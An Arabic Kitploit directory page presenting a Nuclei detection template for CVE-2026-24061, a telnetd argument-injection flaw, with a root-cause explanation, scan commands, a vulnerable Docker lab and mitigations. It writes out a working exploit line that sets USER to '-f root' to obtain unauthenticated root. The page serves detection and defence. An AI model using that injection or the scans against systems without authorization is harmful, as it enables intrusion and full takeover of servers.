Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/mr-zapi/cve-2026-24061
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الشبكاتاختبار الاختراقالتعلم والتعليم
GitHubmr-zapi/cve-2026-24061

CVE-2026-24061

# قالب Nuclei لاكتشاف CVE-2026-24061، حقن وسيطات telnet حرج في GNU inetutils telnetd يسمح بوصول جذر غير مصادق.

عرض المستودع
1منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-24061 - حقن وسائط Telnet

قالب Nuclei لاكتشاف ثغرة CVE-2026-24061 في GNU inetutils telnetd، والتي تسمح بالحصول على صلاحيات root دون مصادقة.

📋 وصف الثغرة

CVE-2026-24061 هي ثغرة حرجة من نوع حقن الوسائط (argument injection) في GNU inetutils telnetd، تسمح للمهاجم بالحصول على shell بصلاحيات root دون معرفة كلمة المرور.

كيف تعمل؟

  1. جذر المشكلة: في عام 2015، تمت إضافة قالب تسجيل دخول جديد في telnetd مع معامل ديناميكي %U:
root@kitploit:~
   /usr/bin/login -p -h %h %?u{-f %u}{%U}
  1. الثغرة: متغير البيئة USER يُمرَّر عبر بروتوكول telnet (RFC 1572 NEW-ENVIRON) ولا يتم تعقيمه قبل إدراجه في الأمر.

  2. الاستغلال: يضبط المهاجم USER="-f root" عند الاتصال:

root@kitploit:~
   USER="-f root" telnet -a target.com 23
  1. النتيجة: يتحول أمر تسجيل الدخول إلى:
root@kitploit:~
   /usr/bin/login -p -h hostname -f root

العلم -f يعني "تخطي المصادقة" → root بدون كلمة مرور 💀

🎯 الإصدارات المتأثرة

  • GNU inetutils telnetd مع قالب تسجيل دخول قابل للاستغلال
  • على سبيل المثال: inetutils-telnetd 2:2.0-1+deb11u2
  • الأنظمة التي يستخدم فيها telnetd تسجيل الدخول التلقائي دون Kerberos

🚀 الاستخدام

الفحص الأساسي

root@kitploit:~
nuclei -t cve-2026-24061.yaml -u target.com:23 -code

أهداف متعددة

root@kitploit:~
nuclei -t cve-2026-24061.yaml -l targets.txt -code

🔬 مختبر الاختبار

للاختبار، يمكن تشغيل حاوية Docker قابلة للاستغلال:

root@kitploit:~
FROM debian:11-slim

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y --no-install-recommends \
      inetutils-telnetd=2:2.0-1+deb11u2 \
      telnet && \
    rm -rf /var/lib/apt/lists/*

RUN useradd user1 && \
    sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf

EXPOSE 23

CMD ["/usr/sbin/inetutils-inetd", "-d"]

التشغيل:

root@kitploit:~
# بناء الصورة
docker build -t vuln-telnetd .

# التشغيل
docker run -d -p 2323:23 vuln-telnetd

# التحقق من الثغرة
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v

🛡️ الحماية

  1. تحديث inetutils إلى الإصدار المُصحَّح
  2. تعطيل telnetd واستخدام SSH
  3. تصفية المنفذ 23 على جدار الحماية
  4. مراقبة الاتصالات إلى telnet

📚 الروابط

  • NVD - CVE-2026-24061
  • SafeBreach Labs - Root Cause Analysis

📊 درجة CVSS

9.8 / 10 - حرجة

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • AV:N - شبكة (هجوم عبر الشبكة)
  • AC:L - تعقيد منخفض (سهل الاستغلال)
  • PR:N - لا تتطلب صلاحيات (لا حاجة للمصادقة)
  • UI:N - لا تفاعل من المستخدم (استغلال تلقائي)
  • C:H/I:H/A:H - تأثير عالٍ على السرية والسلامة والتوافر

⚠️ إخلاء مسؤولية

هذه الأداة مخصصة فقط لاختبار الأمان القانوني للأنظمة التي لديك إذن صريح لاختبارها.

المؤلف غير مسؤول عن أي استخدام غير مشروع لهذا القالب.

👤 المؤلف

Created by Mr.Zapi

تنزيل الأداة